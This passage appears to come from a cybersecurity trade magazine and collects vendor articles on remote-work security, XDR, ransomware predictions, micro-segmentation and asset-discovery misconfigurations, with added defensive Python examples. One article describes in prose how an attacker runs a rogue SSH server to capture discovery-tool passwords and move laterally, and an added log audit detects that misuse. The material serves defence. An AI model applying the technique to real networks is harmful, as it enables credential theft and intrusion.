This new normal brings with it changed user habits and, with inadequate security protection on these devices, an increased level of risk in the form of new unknowns such as hacked devices and distributed denial of service attacks. The connected home and other IoT disrupt traditional ways of doing business, acting as a bridge between the virtual and physical worlds and offering new, almost limitless benefits for workforces and education. At the same time, they open up opportunities for attackers that have never existed before; remote work is a game changer for society, bringing huge benefit, but it is crucial that we also understand the risks. Faced with a more integrated and widespread network, protection against business email compromise, data theft and scams is something that all organizations and users must implement. It is therefore critical that organizations invest in collaborative tools that enable remote workers to do their jobs securely while adhering to protective stay-at-home initiatives worldwide.

It Starts at Home

Working from home creates a communication barrier between employees, preventing instant, in-person discussions about suspicious digital activity they may observe, for example an unusual email. The only current replacement for these face-to-face discussions is virtual conference calls, themselves a popular security oversight and target for attackers. While this face-to-face communication is valuable, it is not essential to security, provided the correct automated detection and prevention mechanisms are in place. To protect these avenues of online correspondence, organizations must become more security-conscious, starting with the user and their awareness of attacker behavior. That can be difficult given the added distractions workers face at home, including childcare and deadline pressures.

From a technical perspective, the home network should not be trusted: it brings new vulnerabilities and cannot support devices the way a corporate network would, which makes a virtual private network (VPN) essential. In some cases a home PC is used for other purposes by other members of the family, or an employee may want to use a personal device to access corporate information, for example by plugging in a work USB drive. Such misuse not only creates opportunities for attackers within the network but also physically exposes devices to threats. These technical risks, combined with the rushed and unpredictable nature of home working, present a wide range of vulnerabilities that ever smarter attackers can take advantage of. It is not enough to advise employees on the correct device and data conduct at home; organizations need to go further, accept the given risks and implement the appropriate protection mechanisms.

To prevent device protection from being overlooked amid the irregularity of working from home, organizations should consider investing in training for remote workers to increase user awareness, and in more thorough backup systems. These are crucial for safe, efficient and secure business operations, and help maintain normalcy. Preventative measures can also be taken at an administrative level, especially for video conferencing over collaboration platforms: using unique access codes for each meeting, enabling a waiting room to keep track of participants, and limiting screen-sharing options within the meeting all protect privacy. With the knowledge to put basic security measures in place, question browser pop-ups and restore from a backup if things become corrupted, organizational breaches – and breakages – can be prevented.

Securing Devices from the Inside, Out

With many countries having passed the peak of the COVID-19 pandemic, this ‘new normal’ is expected to continue far into the future, so demand for remote device security is not likely to wane. In answer to this search for long-term, full-coverage protection, Trusted Computing Group (TCG) has been working on device security that protects against the new risks of our “new normal” from the inside. Offering agility and fast deployment, Trusted Computing provides multi-layered security to safeguard corporate confidential information and personal data against increasingly sophisticated interception and threats in remote working, not only within PCs but also among IoT and cloud-connected devices and networks. Such solutions come in the form of hardware-based, embedded security subsystems such as the Trusted Platform Module (TPM). When implemented, these chips establish a reliable trust relationship between interconnected devices, protecting against cyberthreats. Their cost-effectiveness lets organizations affordably protect entire networks of devices, securing systems thoroughly and efficiently.

TCG specifications are designed to complement government guidelines for a safer connected future. This includes not only internal components such as the TPM, but also security-reinforcing authentication mechanisms such as multi-factor authentication or longer passwords. Within a network, it is also encouraged to use device provisioning, ensure strong user authentication mechanisms, employ PKI-based certification and anchor the whole system in a hardware-based root of trust. Many of these measures are already available in commercial and government digital infrastructures and are recommended for full-coverage data protection. COVID-19 has significantly impacted society, pushing Digital Transformation (DX) forward in many places all over the world. Where working from home was not standard practice before the pandemic, many organizations now see it as the future of business, education and collaboration.
However, while DX has been long awaited, we must simultaneously implement the appropriate security protection measures in order to realize its full benefit, and more must be done to create a safe and secure digital ecosystem. The nature of technology, and therefore of cybersecurity, is that it is ever-changing; as devices advance, so do threats. Organizations, having implemented the currently recommended measures, must remain vigilant and keep systems, software and backups updated. To do so, the integrity of network endpoints needs to be measured and continuously monitored so that endpoint compromises are detected rather than missed. In adapting to our new normal and changing environment, it is vital that we adjust to the new technology challenges rapidly and proactively. By employing this security-first approach and building on the essential principles of updating, protection and resilience, billions of IoT and cloud systems will benefit, providing a safe, secure future despite growing cybersecurity risk in our increasingly connected world.


About the Authors Steve Hanna is the co-chair of the Embedded Systems Work Group in the Trusted Computing Group (TCG) and Senior Principal at Infineon Technologies. Hanna is a member of the Security Area Directorate in the Internet Engineering Task Force, also serving as the liaison from the TCG to the Industrial Internet Consortium. He is the author of several IETF and TCG standards and published papers, an inventor or co-inventor on 47 issued U.S. patents, and a regular speaker at industry events. He holds a Bachelor’s degree in Computer Science from Harvard University. Steve Hanna can be reached online at [email protected] and at our company website: https://trustedcomputinggroup.org/.

Jun Takei is the co-chair of the Japan Regional Forum in the Trusted Computing Group and is a Principal Engineer at Intel. Since joining Intel, he has been responsible for technology policy and standards, and has a wealth of experience in the Internet and wireless communications from both a technology and policy point of view. From 2004 to 2015, he was a board member of one of the most successful Internet research consortiums, the WIDE project, and has also spent time lecturing at Keio University. Now, he is working as the director of Security and Trust Policy in Intel. Jun can be reached online at [email protected] and at our company website: https://trustedcomputinggroup.org/.


The Best Network Protection: Go Deep or Go Broad? Combining Breadth and Depth Brings Full Protection By Albert Zhichun Li, Chief Scientist, Stellar Cyber

Almost since the beginning of network security, vendors and practitioners have wrestled with the choice between going deep and going broad in their security solutions, and most products lean predominantly one way or the other. Going deep typically means careful monitoring and analysis of certain types of threats or behaviors at the cost of not examining a much broader range of activity. Broader solutions may lack the clarity and fidelity needed for fast, accurate alerting, and they may also miss important indicators.

The battle to protect data, systems, users and networks has been far from easy. Today, a more interesting headline might announce when a data breach has not occurred. The odds heavily favor attackers penetrating a network and then having free rein to steal or damage. These high-value attacks are human-run and employ multiple approaches over a period of time. North-south activity (traffic into and out of the network) and east-west activity (lateral movement inside it) let an attacker systematically, and sometimes serendipitously, accomplish their mission. One step, such as reconnaissance through some kind of scanning, leads to the next and the next. This reality means that both depth and breadth are important if an organization has any hope of curtailing an attack.


As solutions for eXtended Detection and Response (XDR)—and perhaps other categories of solutions— emerge, one of the more important questions they will have to face is this ongoing one between depth and breadth. Depth and breadth can work together to ensure higher fidelity alerts with a low number of false positives. The ability to understand potential attacker activity with detail as well as context can make all the difference in flagging something that is truly important. To be productive, activities must be identified that are both abnormal and malicious.

Breadth is important since attackers use multiple tactics, largely sequentially. The ability to see the connectedness between events gives security groups a substantial advantage. This “seeing the forest for the trees” can identify something that might otherwise be missed or provide the fidelity to prevent “crying wolf” too many times. Breadth can also unify the strength of individual security solutions, each with its own area of expertise and specialization.

Depth brings important details and may answer a number of the “who, what, where, when, how” questions. EDR systems, for instance, are best at understanding endpoint activity; CASB solutions are primed to make sense of certain cloud activities; UEBA tools help examine who did what on the network.

Of course, it is simply not possible for one tool or system to do everything with full expertise and precision. This is why the idea of not only integrating but also aggregating key findings from a myriad of tools is so powerful. Sharing “the best of” from each system ensures that the whole is more valuable than the sum of the parts. In this way, breadth and depth can combine and work together to minimize the tradeoffs of any single design and produce better results.

Breadth should also work to fill any gaps between detections provided by various systems that might exist. Usually this means gaps in scope, but sometimes it might mean limitations or delays in what data is provided by a security system and when. Sensors can help fill this gap that inevitably exists. Logs may also provide supplemental information, but they generally cannot be depended on for timely insights and may be limited in what is captured. They can also be manipulated.
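To make the depth-plus-breadth argument concrete, here is an added example (not code from the original article or from Stellar Cyber) of the simplest form of cross-source correlation: events from a network sensor, an EDR agent and a UEBA tool are grouped per host into a time window, and an incident is raised only when independent sources corroborate each other. The event schema, the source and host names, the event types and the scoring are assumptions for the example; the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events from three hypothetical telemetry sources. The field
# names and event types are assumptions for this example, not any vendor's schema.
EVENTS = [
    {"ts": "2021-01-05T09:00:00", "source": "netflow", "host": "ws-17",
     "type": "internal_port_scan", "severity": 2},
    {"ts": "2021-01-05T09:04:30", "source": "edr", "host": "ws-17",
     "type": "office_spawned_powershell", "severity": 3},
    {"ts": "2021-01-05T09:06:10", "source": "ueba", "host": "ws-17",
     "type": "first_admin_share_access", "severity": 3},
    # a lone scan from the host that routinely runs the vulnerability scanner
    {"ts": "2021-01-05T11:30:00", "source": "netflow", "host": "scanner-01",
     "type": "internal_port_scan", "severity": 2},
    # two signals on one host, but 17 hours apart: no corroboration
    {"ts": "2021-01-05T14:00:00", "source": "edr", "host": "srv-db1",
     "type": "office_spawned_powershell", "severity": 3},
    {"ts": "2021-01-06T07:00:00", "source": "ueba", "host": "srv-db1",
     "type": "first_admin_share_access", "severity": 3},
]

WINDOW = timedelta(minutes=30)


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def correlate(events, window=WINDOW, min_sources=2):
    """Group events per host into time windows and raise an incident only when
    at least `min_sources` independent sources agree inside one window.

    Single-source events never become incidents on their own; that threshold is
    what keeps the output high fidelity."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)

    incidents = []
    for host, evs in by_host.items():
        evs.sort(key=_ts)
        i = 0
        while i < len(evs):
            start = _ts(evs[i])
            # events are sorted, so one window is a contiguous run starting at i
            cluster = [e for e in evs[i:] if _ts(e) - start <= window]
            sources = {e["source"] for e in cluster}
            if len(sources) >= min_sources:
                incidents.append({
                    "host": host,
                    "start": cluster[0]["ts"],
                    "end": cluster[-1]["ts"],
                    "sources": sorted(sources),
                    "chain": [e["type"] for e in cluster],
                    # depth (per-event severity) weighted by breadth (distinct sources)
                    "score": sum(e["severity"] for e in cluster) * len(sources),
                })
                i += len(cluster)
            else:
                i += 1
    return incidents


if __name__ == "__main__":
    for inc in correlate(EVENTS):
        print(inc["host"], inc["score"], " -> ".join(inc["chain"]))
```

On the constructed input only ws-17 produces an incident: a scan, a suspicious child process and a first-time admin share access from three different sources within six minutes. The lone scan from scanner-01 and the two far-apart signals on srv-db1 stay below the threshold. Lowering `min_sources` to 1 turns every event into an alert, which is the “crying wolf” failure mode the article describes; weighting by the number of distinct sources, rather than simply summing severities, is what makes corroborated activity outrank noisy single-source detections.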

Depth and breadth are good things, and vendors and practitioners should continue to build expertise in both areas. Still, to gain an upper hand against attackers, organizations cannot afford to choose between the two. Uniting these two dimensions will help even the odds.

About the Author Albert Zhichun Li is the Chief Scientist at Stellar Cyber. He is a world-renowned expert in cyber security, machine learning (ML), systems, networking and IoT. He is one of the few scientists known to heavily apply ML to security detection/investigation. Albert has 20 years of experience in security, and has been applying machine learning to security for 15 years. Previously, he was the head of NEC Labs’ department, where he initiated, architected and commercialized NEC’s own AI-driven security platform. He has filed 48 US patents and has published nearly 50 seminal research papers. Dr. Li has a Ph.D. in system and network security from Northwestern University and a B.Sc. from Tsinghua University. Albert can be reached online at [email protected] and at our company website http://stellarcyber.ai


Cybersecurity Predictions For 2021 Preparing for the “next normal” By Topher Tebow, Cybersecurity Analyst (Malware), Acronis

For cybersecurity professionals, this year began more or less like any other. Fast forward to April, and nearly half of the American workforce was working from home — relying on remote access tools and cloud services for everyday business needs. It’s been a time of great challenges and opportunities. We’ve finally settled into the “new normal,” but cyberthreats continue to evolve and respond to the new environment. As we look forward to 2021, here are a few of our cybersecurity predictions:

1. Attackers will continue targeting remote workers It goes without saying that the COVID-19 pandemic has fundamentally changed how business is done these days. Ninety-two percent of global organizations adopted new IT technologies this year, driven by the need to enable or expand their remote operations. Work-from-anywhere is the new normal, and with that comes a new IT infrastructure — and myriad associated security and privacy risks. Companies have rushed to integrate new tools and services for collaboration and remote access, but often lack the time to thoroughly vet these solutions — or the budget to work with tested vendors, and to properly train IT staff. Countless organizations are currently using misconfigured solutions (or ones that are simply of dubious quality), and are at elevated risk as a result.


2. Threats against MSPs, cloud services, and businesses will rise With data accessibility at the center of everyday business operations — and remote access and collaborative features more necessary than ever — IT services are a requirement for every organization. Small and medium businesses are particularly reliant on managed service providers (MSPs) to fulfill this need. We’re already seeing an increase in attacks against MSPs and cloud service providers — no surprise, given their status as a prime attack target. Successfully compromising a service provider is a far more efficient prospect than targeting individual businesses, as it allows cybercriminals access to the provider’s entire customer base in one fell swoop. Expect to see this trend continue.

3. Data exfiltration will become a bigger threat than encryption While we expect ransomware to hold its position as the number-one cyberthreat to businesses in 2021, the structure of these threats is shifting. In the near future, we expect that stealing sensitive data — rather than simply encrypting it on infected systems — will be the primary form that ransomware strikes take. Cybercriminals seek to monetize every attack, and recent trends have demonstrated that exfiltrating data greatly increases the odds of successfully negotiating a ransom demand. The prospect of having sensitive data — like trade secrets or personally-identifiable customer and employee information — sold or publicly released adds tremendous pressure to companies and government entities. Data protection and data loss prevention solutions will be particularly important in the coming year.

4. Automation and personalization will cause malware samples to skyrocket Advances in computing power and artificial intelligence are kicking the malware development cycle into overdrive. Cybercriminals can build and iterate new cyberthreats with dizzying speed, sending out waves of attacks and using the results to shape their next variants. In addition, these threats are increasingly personalized — purpose-built for their targets using information mined from corporate websites and social media profiles. As spear-phishing campaigns have shown time and again, those who make the effort to tailor attacks in this way are often rewarded with an increased success rate. The industrialization of malware and social engineering campaigns poses a significant threat to modern businesses. The average lifetime of a malware sample is now down to a mere 3.4 days, severely hampering the effectiveness of signature-based detection. Now more than ever, it’s critical for organizations to invest in complete cyber protection solutions that can effectively detect and block both known and unknown cyberthreats.


5. Malware will explore new targets Ransomware threats are expanding beyond their traditional purview of Windows and macOS desktops. Within organizations, increasingly-exposed industrial control systems (ICS) make a tempting target for takeover and extortion. Both at home and in the office, the growing adoption of the internet of things (IoT) — especially in connection with 5G — will continue to present new areas for infection in the form of smart devices. While internet-enabled appliances themselves don’t tend to store large quantities of data (nor particularly sensitive information), they present a potential attack vector towards their manufacturers — and may be incorporated into DDoS-fueling botnets.

6. Preparing for the next wave of cyberthreats This has been a challenging year for businesses, to be sure. And we face a slew of new challenges in 2021. Expect new tactics, never-before-seen malware, relentless automation, and attacks against surfaces that may not be well protected. Now more than ever, an intelligent and integrated approach is necessary to stay safe in the digital space. Businesses must invest in solutions that can stand toe-to-toe with the latest cyberthreats and provide complete cyber protection.

About the Author Topher Tebow is a cybersecurity analyst, with a focus on malware tracking and analysis, at Acronis. Topher spent nearly a decade combating web-based malware before moving into endpoint protection. Topher has written technical content for several companies, covering topics from security trends and best practices, to analysis of malware and vulnerabilities. In addition to being published in leading cybersecurity publications, Topher has spoken at InfoSec conferences, and is an active part of the Arizona cybersecurity community. Topher can be reached online at @TopherTebow on Twitter, and at our company website https://www.acronis.com/.


Why 'Thinking Small' Is the Way to Stop Ransomware and Other Cyber Attacks By Yuval Baron, CEO at AlgoSec, explains why micro-segmentation is one of the most effective methods to limit the damage of attacks on a network

On August 15, 2020, the cruise line Carnival Corporation fell victim to a cyber-attack that may have resulted in the loss of personal data of millions of passengers and crew members.

Carnival is the world's largest travel and leisure company, carrying approximately 13 million passengers per year. The company has not revealed how many customers or which of its individual brands were affected, but what we do know is that law enforcement agencies were notified because one of the brands reported a ransomware attack that accessed and encrypted a portion of its IT systems.

This is not the first time that Carnival's security measures have been circumvented by hackers. In 2019, a cyber attack on Princess Cruises and Holland America Line resulted in the loss of the personal data of hundreds of passengers and crew members. The criminals stole names, social security numbers, passport numbers and credit card information.


Carnival’s experience will feel all too familiar to some businesses. In fact, we recently started working with two organizations that fell victim to high-profile ransomware attacks earlier this year, and reached out to us after the event to help prevent and mitigate such attacks in the future by tightening their security posture and limiting their attack surface.

While many believe that looking at the big picture is the best way to find solutions to protect large corporations, the answer actually lies in something much smaller - the micro-segmentation of the network.

Damage limitation through micro-segmentation

Hackers are never going to give up targeting large corporations, and ransomware attacks like that on Carnival will never disappear. Moreover, as criminals become increasingly sophisticated, it has become difficult to fully protect your network. What companies can do, however, is limit the potential damage hackers can cause if they do gain access to sensitive company or customer data.

One way to do this is through network micro-segmentation, which is regarded as one of the most effective methods to reduce an organization’s attack surface. A lack of it has often been cited as a contributing factor in some of the largest data losses in ransomware attacks.

Micro-segmentation minimizes the damage that hackers can do if they gain access, by stopping lateral movement across your networks. Just as the watertight compartments in a ship should contain flooding if the hull is breached, segmentation isolates servers and systems into separate zones to contain intruders or malware as well as insider threats, limiting the potential security risks and damage.

Controlling the borders

Although micro-segmentation is recognized as an effective method to enhance security, some businesses have been slow to adopt it because it can be complex and costly to implement, especially in traditional on-premises data centers.

Moving to virtualized data centers with Software-Defined Networking (SDN) and cloud connectivity removes some of these barriers. The flexibility of the SDN enables more advanced, granular zoning, allowing networks to be divided into hundreds of micro-segments. To achieve this level of security in a traditional data center would be prohibitively expensive and too complicated to implement.

But virtualized data centers do not eliminate all the stumbling blocks. Security policies and firewall configurations still have to be enforced on every system and across different IT environments, and doing that manually is an enormous task for the IT security department, which then lacks the time for larger projects. A filtering policy enforced by the micro-segmented structure is still necessary, and writing that policy is the first and biggest hurdle to overcome.


Simplification of micro-segmentation through security automation

Automated network management makes it much easier for companies to define and enforce their micro-segmentation strategy. It also ensures that critical business services are not blocked by misconfiguration and that compliance requirements are met. Such tooling performs application discovery from NetFlow data and identifies unprotected data streams on the network: flows that neither pass through a firewall nor are filtered for an application. It detects changes in the network that conflict with the current micro-segmentation policy, immediately suggests policy changes based on that information and, if desired, validates and enforces them automatically.
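As an added illustration of the discovery step described above (example code, not AlgoSec's product or any vendor's implementation), the following Python takes NetFlow-style records and a zone-and-rule model of a micro-segmentation policy and reports the flows the policy does not account for: cross-zone traffic with no allow rule, intra-zone traffic that never crosses the segment firewall, and endpoints that belong to no zone. The zone ranges, allow rules and flow records are constructed for the example.

```python
import ipaddress
from collections import Counter

# Constructed micro-segmentation model: each zone is an address range, and an
# allow rule is (src_zone, dst_zone, dst_port). Names and ranges are assumptions.
ZONES = {
    "users": ipaddress.ip_network("10.10.0.0/16"),
    "web":   ipaddress.ip_network("10.1.0.0/24"),
    "app":   ipaddress.ip_network("10.2.0.0/24"),
    "db":    ipaddress.ip_network("10.3.0.0/24"),
}
ALLOW = {
    ("users", "web", 443),
    ("web", "app", 8080),
    ("app", "db", 5432),
}

# Constructed NetFlow-style records: (src_ip, dst_ip, dst_port, proto, bytes).
FLOWS = [
    ("10.10.5.20", "10.1.0.10",  443,  "tcp", 1200),   # users -> web, allowed
    ("10.1.0.10",  "10.2.0.15",  8080, "tcp", 8000),   # web -> app, allowed
    ("10.2.0.15",  "10.3.0.5",   5432, "tcp", 64000),  # app -> db, allowed
    ("10.10.5.20", "10.3.0.5",   5432, "tcp", 3000),   # a workstation talking straight to the DB
    ("10.1.0.10",  "10.1.0.11",  22,   "tcp", 900),    # web -> web SSH, never crosses a firewall
    ("10.2.0.15",  "10.3.0.5",   22,   "tcp", 500),    # app -> db on a port no rule covers
    ("10.10.7.9",  "192.0.2.50", 443,  "tcp", 100),    # destination belongs to no zone at all
]


def zone_of(ip):
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return None


def find_gaps(flows, allow=ALLOW):
    """Return every observed flow that the segmentation policy does not account for."""
    gaps = []
    for src, dst, port, proto, nbytes in flows:
        sz, dz = zone_of(src), zone_of(dst)
        if sz is None or dz is None:
            reason = "endpoint is outside every defined zone"
        elif sz == dz:
            reason = "intra-zone flow bypasses the segment firewall"
        elif (sz, dz, port) not in allow:
            reason = "no allow rule covers this zone pair and port"
        else:
            continue  # explicitly allowed: the firewall sees and filters it
        gaps.append({"src": src, "dst": dst, "port": port, "proto": proto,
                     "bytes": nbytes, "src_zone": sz, "dst_zone": dz, "reason": reason})
    return gaps


def suggest_rules(gaps):
    """Collapse cross-zone gaps into candidate rules, most-observed first, so an
    operator can decide to allow, block, or split a zone for each one."""
    counts = Counter(
        (g["src_zone"], g["dst_zone"], g["port"])
        for g in gaps
        if g["src_zone"] and g["dst_zone"] and g["src_zone"] != g["dst_zone"]
    )
    return counts.most_common()


if __name__ == "__main__":
    for g in find_gaps(FLOWS):
        print(f'{g["src"]} -> {g["dst"]}:{g["port"]}  {g["reason"]}')
    print("candidate rules:", suggest_rules(find_gaps(FLOWS)))
```

The three allowed flows are silent; the four others are exactly the “unprotected data streams” the paragraph refers to. The workstation-to-database flow is the one that matters most for ransomware containment, since it is the lateral path a compromised user endpoint would take, and it becomes a candidate rule the operator must explicitly accept or deny. The intra-zone SSH flow is not fixable with a rule at all; it is a sign the web zone needs to be split further, which is the point of going from coarse segments to micro-segments.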

So although micro-segmentation can be a costly and time-consuming process, solutions are now available to significantly speed up, improve and reduce the cost of setup and maintenance. An SDN data center and cloud combined with security automation puts companies on the road to effective protection against ransomware attacks of all kinds.

About the Author Yuval Baron is the CEO of AlgoSec. Prior to founding AlgoSec, Yuval Baron co-founded Actelis Networks Inc. in 1998 where he served as its CEO until 2002. Actelis Networks is the leading provider of high performance, scalable broadband over copper solutions. During his tenure, Actelis Networks raised $75 million in three separate funding up-rounds from investors including USVP, NEA, Walden, Carlyle, Salomon Smith Barney, France Telecom, Sumitomo, and Vertex. Prior to Actelis, Mr. Baron was vice president of sales and marketing at RIT Technologies (Nasdaq: RITT), a provider of network infrastructure solutions for data centers and communication networks. At RIT, he built a distribution network across 55 countries and drove revenue growth which led to a successful IPO. Prior to RIT, Mr. Baron spent a decade with Comverse Technology (Nasdaq: CMVT), a leading global provider of telecom business solutions. Mr. Baron has a B.Sc. in Mathematics, Computer Science, and Economics (Cum Laude) and an MBA in Finance. Yuval can be reached online at https://twitter.com/AlgoSec and at our company website https://www.algosec.com/


Your Vulnerabilities are Making You Miss Your Misconfigurations IT organizations regularly configure asset discovery tools in ways that leave them open to abuse by attackers; Vendor configuration documentation lacks details on the risk.

By Evan Anderson, Director of Offense, Randori

The security industry pays lots of attention to vulnerabilities and the need for patching. While there is a need for this, the industry has over-indexed on vulnerability management in the past couple of decades. What doesn’t get as much attention, and is often more important to an attacker, are things like common misconfigurations or an improper implementation that introduces unintended risk. I can say with confidence that some vendor-recommended implementation strategies are widely abused by red-teamers and attackers to achieve their objectives. I’ve been taking advantage of these types of flaws since the early 2000s, and it’s so common that red-teamers have developed tooling to take advantage of faulty configurations.

At Randori, we regularly see improper implementations, suggesting many blue-teamers are unaware of the risks of certain configuration methods. Vendor-documented implementation methods that are commonly used by IT orgs can introduce unintended risk into your environment. And the challenge is that improper implementations can be near impossible to spot, and even more problematic to fix.

Let’s take a closer look at this problem, using asset discovery tools as an example -- specifically ServiceNow Discovery. Organizations have rightfully started using auto discovery tools in order to find services, applications, and devices and to mitigate the exposure of misconfigurations before attackers can take advantage of them. These tools give companies a better understanding of what systems are on their network, their patch level, and how the systems are configured. Discovery tools programmatically log into systems and run commands to check their configuration.

Unfortunately, asset discovery tools can themselves be improperly configured. This will increase risk to an organization rather than reducing it.

Before I go on, a note: ServiceNow Discovery is not vulnerable or bad, nor are Virima or BMC Helix Discovery (other asset discovery tools that suggest similar implementations); it is simply a concrete example recently used by my team. The problem: when ServiceNow Discovery, BMC Helix Discovery or Virima are configured with password credentials rather than a private key, they can easily be taken advantage of by an attacker.

It’s low risk to use this weakness for a multitude of reasons:
1. I don’t have to make an exploit (which is expensive and takes time).
2. I can just sit on the network and it will give me credentials; I don’t have to do any discovery or port scanning.
3. I won’t trigger an alert. In many cases alerts associated with discovery tools are ignored or disabled because they are considered benign (and with good reason).
4. I don’t have to brute force entry (which could trigger alerts).


“Discovery” explores UNIX and Linux devices using SSH to execute commands on the system in question. In order to run the exploratory commands, “Discovery” must have some sort of credential in order to access the system. ServiceNow’s documentation describes two ways to configure these credentials. One is username and password; the other is an SSH key. It is more secure to use SSH private key credentials rather than an SSH password, but password credentials are often preferred because they are easier to configure. In fact, the ServiceNow Discovery documentation does explicitly state: “SSH private key credentials are recommended over SSH password credentials for security reasons.” However, it doesn’t go into detail.


ServiceNow Discovery Documentation

People use passwords more than private keys because of the ease of deployment. Simply add an account to the system with a password and you’re in. Private key authentication has the extra steps of generating the key pair, protecting the private key and copying the public key into place on the server systems.

Capability in Action Let’s assume then as the attacker, I have gained access to a network by compromising a Linux system and am looking to move laterally to other systems. I begin by quietly observing or sniffing the network traffic with the goal of gaining situational awareness attempting to figure out what I can see and what I have access to.

While watching network traffic, I notice an IP address attempting to connect to my compromised system on TCP port 22 (the default port for SSH servers.) So I know somebody or something is attempting to login via SSH. I quickly spin up an SSH server I control, and wait.

Often the username for these types of asset discovery tools references the product in some way, for instance `ServiceNowUser`. Armed with just that information, I know those credentials likely work on other *nix systems (UNIX, macOS, FreeBSD, Linux), and users are trained to ignore logins from that user.

Now I’m off to the races -- I can capture the leaked credentials and move laterally to other systems on the network, with little operational risk. And since those credentials are used to verify patch states and system configurations, I also have access to that data on each system, giving me a lot more information to do my job easily and stealthily.

For anyone implementing a new technology, consider taking the extra time to configure it using a private key rather than a password. Review documentation thoroughly and pay special attention to best practices. Ask your vendor to give more details on security best practices if they aren’t included in the documentation. Some configurations may be quick wins for a project, but be careful you aren’t inadvertently giving away the keys to the kingdom. The details are important to understanding what risk you are accepting.
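As an added example (not from the article or from Randori, ServiceNow or any vendor), here is the defender's side of the scenario above: an audit over sshd authentication log lines that flags the discovery account being accepted with a password anywhere, and the discovery account being presented from any host other than the discovery appliance. The account name svc_discovery, the appliance address 10.0.5.10 and the log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed OpenSSH auth-log lines in syslog format. The account name,
# host names, addresses and key fingerprints are assumptions for this example.
LOG = """\
Jan  5 09:00:01 web01 sshd[2201]: Accepted publickey for svc_discovery from 10.0.5.10 port 50122 ssh2: RSA SHA256:k0ZtZ3m4Q2p9r8x1Y6c7D5e3F2g1H0i9J8k7L6m5N4o
Jan  5 09:00:03 app02 sshd[1877]: Accepted password for svc_discovery from 10.0.5.10 port 50140 ssh2
Jan  5 09:12:44 db03 sshd[9031]: Accepted password for svc_discovery from 10.0.7.33 port 41002 ssh2
Jan  5 09:12:50 db03 sshd[9031]: pam_unix(sshd:session): session opened for user svc_discovery by (uid=0)
Jan  5 09:13:02 web01 sshd[2299]: Failed password for svc_discovery from 10.0.7.33 port 41010 ssh2
Jan  5 10:00:00 web01 sshd[2401]: Accepted publickey for alice from 10.0.9.2 port 52000 ssh2: ED25519 SHA256:Q1w2E3r4T5y6U7i8O9p0A1s2D3f4G5h6J7k8L9z0X1c
"""

DISCOVERY_ACCOUNTS = {"svc_discovery"}
# Only the discovery appliance should ever authenticate as the discovery account.
APPROVED_SOURCES = {"10.0.5.10"}

AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_auth(log):
    """Yield one dict per sshd authentication line; other sshd lines are skipped."""
    for line in log.splitlines():
        m = AUTH_RE.match(line)
        if m:
            yield m.groupdict()


def audit(log, accounts=DISCOVERY_ACCOUNTS, approved=APPROVED_SOURCES):
    """Flag the two conditions the attack relies on: a host accepting the discovery
    account with a password at all, and the discovery credential being presented
    (successfully or not) from somewhere other than the discovery appliance."""
    findings = []
    for ev in parse_auth(log):
        if ev["user"] not in accounts:
            continue
        if ev["result"] == "Accepted" and ev["method"] == "password":
            findings.append({**ev, "rule": "password_auth_accepted_for_discovery_account"})
        if ev["src"] not in approved:
            findings.append({**ev, "rule": "discovery_account_used_from_unapproved_source"})
    return findings


def hosts_accepting_passwords(findings):
    """Hosts that still take a password for the discovery account: fix their sshd config."""
    return sorted({f["host"] for f in findings
                   if f["rule"] == "password_auth_accepted_for_discovery_account"})


def unapproved_sources(findings):
    """Source -> hosts it touched. After the credential has been captured, this is
    where the attacker shows up, because the rogue SSH server itself never logs to you."""
    out = defaultdict(set)
    for f in findings:
        if f["rule"] == "discovery_account_used_from_unapproved_source":
            out[f["src"]].add(f["host"])
    return {src: sorted(hosts) for src, hosts in out.items()}


if __name__ == "__main__":
    found = audit(LOG)
    print("hosts accepting passwords:", hosts_accepting_passwords(found))
    print("unapproved sources:", unapproved_sources(found))
```

The second rule is the one that catches the scenario: the attacker's own SSH server will not report to your SIEM, but the stolen password then gets replayed against legitimate hosts from an address that is not the appliance, and those hosts do log it. The first rule is the standing misconfiguration; on OpenSSH it can be enforced rather than merely recommended with a `Match User svc_discovery` block in sshd_config containing `PasswordAuthentication no` and `AuthenticationMethods publickey`, plus a `from="10.0.5.10"` option in front of the key in authorized_keys so that the key is only usable from the appliance even if it is ever exfiltrated.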

Any software that is used on a network should be viewed as part of the attack surface, and thus must be considered when calculating risk. Purchasing a tool is not the solution to the problem, and may in fact cause more harm than good. You must give teams the time to understand the ramifications of a product and how to implement and use it properly in your environment. Recognize the risk you’re taking if you ask your team to implement something on a shorter timeframe; that often means less secure.


About the Author Evan Anderson is the Director of Offense at Randori – where he leads the company’s Hacker Operations Center. In this role, Evan leads a team developing new and novel offensive capabilities for Randori’s automated attack platform. Evan can be reached online at linkedin.com/in/attack/ and at www.randori.com


Are Your Organization’s Critical Assets Five Steps or Fewer from A Cyber Attacker? By Gus Evangelakos, Director Field Engineering, XM Cyber

Cybersecurity is an asymmetric battle -- and one in which attackers hold an unfair advantage. Adversaries maintain the initiative and can attack from novel and unexpected angles, while defenders are forced into a reactive role. The asymmetric nature of cybersecurity isn't the sole reason data breaches continue to rise every year, of course. The popularity of cloud computing and constant expansion of the attack surface also present substantial ongoing challenges for today's organizations. This raises an interesting question: Just how quickly can critical assets be exfiltrated by cyber attackers? The 2020 Verizon Data Breach Investigations Report (DBIR) sheds some light on how attacks are unfolding -- and why adversaries often need only a handful of steps to expose the most valuable "crown jewel" assets.

The Landscape Has Never Been More Favorable for Adversaries Understanding just how vulnerable your systems are is key to assessing risk. This applies to the specifics of our security environments and the larger conditions that affect how and why breaches occur. Misconfiguration errors -- which remain at epidemic levels -- are one reason why attack paths are often so short and direct. Cloud migration mandates, building remote workforce capabilities, managing access on the fly -- all of the demands placed on IT professionals create conditions that are highly conducive to misconfigurations. If you look at the highest-profile data breaches of the last five years, misconfigurations pop up as the culprit again and again.


Launching successful attacks has also never been easier or more accessible, particularly for adversaries with low to moderate skill and limited resources.

● Deloitte estimates a low-end cyber-attack costing just $34 a month could generate $25,000.
● A phishing campaign for $30 a month can return $500 a month.
